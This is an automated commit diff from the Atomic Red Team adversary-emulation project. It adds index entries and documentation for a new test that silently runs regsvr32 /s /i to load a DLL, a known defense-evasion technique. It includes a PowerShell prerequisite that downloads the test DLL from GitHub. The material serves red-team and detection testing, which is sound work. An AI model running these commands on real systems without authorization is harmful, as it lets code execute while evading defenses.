Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

atomics/Indexes/Indexes-CSV/index.csv

@@ -470,6 +470,7 @@ defense-evasion,T1218.010,Regsvr32,1,Regsvr32 local COM scriptlet execution,449a
 defense-evasion,T1218.010,Regsvr32,2,Regsvr32 remote COM scriptlet execution,c9d0c4ef-8a96-4794-a75b-3d3a5e6f2a36,command_prompt
 defense-evasion,T1218.010,Regsvr32,3,Regsvr32 local DLL execution,08ffca73-9a3d-471a-aeb0-68b4aa3ab37b,command_prompt
 defense-evasion,T1218.010,Regsvr32,4,Regsvr32 Registering Non DLL,1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421,command_prompt
+defense-evasion,T1218.010,Regsvr32,5,Regsvr32 Silent DLL Install Call DllRegisterServer,9d71c492-ea2e-4c08-af16-c6994cdf029f,command_prompt
 defense-evasion,T1036.003,Rename System Utilities,1,Masquerading as Windows LSASS process,5ba5a3d1-cf3c-4499-968a-a93155d1f717,command_prompt
 defense-evasion,T1036.003,Rename System Utilities,2,Masquerading as Linux crond process.,a315bfff-7a98-403b-b442-2ea1b255e556,sh
 defense-evasion,T1036.003,Rename System Utilities,3,Masquerading - cscript.exe running as notepad.exe,3a2a578b-0a01-46e4-92e3-62e2859b42f0,command_prompt

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -276,6 +276,7 @@ defense-evasion,T1218.010,Regsvr32,1,Regsvr32 local COM scriptlet execution,449a
 defense-evasion,T1218.010,Regsvr32,2,Regsvr32 remote COM scriptlet execution,c9d0c4ef-8a96-4794-a75b-3d3a5e6f2a36,command_prompt
 defense-evasion,T1218.010,Regsvr32,3,Regsvr32 local DLL execution,08ffca73-9a3d-471a-aeb0-68b4aa3ab37b,command_prompt
 defense-evasion,T1218.010,Regsvr32,4,Regsvr32 Registering Non DLL,1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421,command_prompt
+defense-evasion,T1218.010,Regsvr32,5,Regsvr32 Silent DLL Install Call DllRegisterServer,9d71c492-ea2e-4c08-af16-c6994cdf029f,command_prompt
 defense-evasion,T1036.003,Rename System Utilities,1,Masquerading as Windows LSASS process,5ba5a3d1-cf3c-4499-968a-a93155d1f717,command_prompt
 defense-evasion,T1036.003,Rename System Utilities,3,Masquerading - cscript.exe running as notepad.exe,3a2a578b-0a01-46e4-92e3-62e2859b42f0,command_prompt
 defense-evasion,T1036.003,Rename System Utilities,4,Masquerading - wscript.exe running as svchost.exe,24136435-c91a-4ede-9da1-8b284a1c1a23,command_prompt

atomics/Indexes/Indexes-Markdown/index.md

@@ -862,6 +862,7 @@
   - Atomic Test #2: Regsvr32 remote COM scriptlet execution [windows]
   - Atomic Test #3: Regsvr32 local DLL execution [windows]
   - Atomic Test #4: Regsvr32 Registering Non DLL [windows]
+  - Atomic Test #5: Regsvr32 Silent DLL Install Call DllRegisterServer [windows]
 - [T1036.003 Rename System Utilities](../../T1036.003/T1036.003.md)
   - Atomic Test #1: Masquerading as Windows LSASS process [windows]
   - Atomic Test #2: Masquerading as Linux crond process. [linux]

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -498,6 +498,7 @@
   - Atomic Test #2: Regsvr32 remote COM scriptlet execution [windows]
   - Atomic Test #3: Regsvr32 local DLL execution [windows]
   - Atomic Test #4: Regsvr32 Registering Non DLL [windows]
+  - Atomic Test #5: Regsvr32 Silent DLL Install Call DllRegisterServer [windows]
 - [T1036.003 Rename System Utilities](../../T1036.003/T1036.003.md)
   - Atomic Test #1: Masquerading as Windows LSASS process [windows]
   - Atomic Test #3: Masquerading - cscript.exe running as notepad.exe [windows]

atomics/Indexes/index.yaml

@@ -37850,6 +37850,37 @@ defense-evasion:
         elevation_required: false
         command: "#{regsvr32path}\\#{regsvr32name} /s #{dll_file}\n"
         cleanup_command: "#{regsvr32path}\\#{regsvr32name} /U /s #{dll_file}\n"
+    - name: Regsvr32 Silent DLL Install Call DllRegisterServer
+      auto_generated_guid: 9d71c492-ea2e-4c08-af16-c6994cdf029f
+      description: Regsvr32.exe is a command-line program used to register and unregister
+        OLE controls. Normally, an install is executed with /n to prevent calling
+        DllRegisterServer.
+      supported_platforms:
+      - windows
+      input_arguments:
+        dll_name:
+          description: Name of DLL to Install
+          type: String
+          default: PathToAtomicsFolder\T1218.010\bin\AllTheThingsx86.dll
+        regsvr32path:
+          description: Default location of Regsvr32.exe
+          type: String
+          default: C:\Windows\system32
+        regsvr32name:
+          description: Default name of Regsvr32.exe
+          type: String
+          default: regsvr32.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: AllTheThingsx86.dll must exist on disk at specified location
+          (#{dll_name})
+        prereq_command: 'if (Test-Path #{dll_name}) {exit 0} else {exit 1}'
+        get_prereq_command: |-
+          New-Item -Type Directory (split-path #{dll_name}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/bin/AllTheThingsx86.dll" -OutFile "#{dll_name}"
+      executor:
+        command: "#{regsvr32path}\\#{regsvr32name} /s /i #{dll_name}"
+        name: command_prompt
   T1036.003:
     technique:
       external_references:

atomics/T1218.010/T1218.010.md

@@ -16,6 +16,8 @@ Regsvr32.exe can also be leveraged to register a COM Object used to establish pe
 
 - [Atomic Test #4 - Regsvr32 Registering Non DLL](#atomic-test-4---regsvr32-registering-non-dll)
 
+- [Atomic Test #5 - Regsvr32 Silent DLL Install Call DllRegisterServer](#atomic-test-5---regsvr32-silent-dll-install-call-dllregisterserver)
+
 
 <br/>
 
@@ -183,4 +185,48 @@ copy "C:\Windows\System32\shell32.dll" "#{dll_file}"
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #5 - Regsvr32 Silent DLL Install Call DllRegisterServer
+Regsvr32.exe is a command-line program used to register and unregister OLE controls. Normally, an install is executed with /n to prevent calling DllRegisterServer.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| dll_name | Name of DLL to Install | String | PathToAtomicsFolder&#92;T1218.010&#92;bin&#92;AllTheThingsx86.dll|
+| regsvr32path | Default location of Regsvr32.exe | String | C:&#92;Windows&#92;system32|
+| regsvr32name | Default name of Regsvr32.exe | String | regsvr32.exe|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+#{regsvr32path}\#{regsvr32name} /s /i #{dll_name}
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: AllTheThingsx86.dll must exist on disk at specified location (#{dll_name})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{dll_name}) {exit 0} else {exit 1} 
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path #{dll_name}) -ErrorAction ignore | Out-Null
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/bin/AllTheThingsx86.dll" -OutFile "#{dll_name}"
+```
+
+
+
+
 <br/>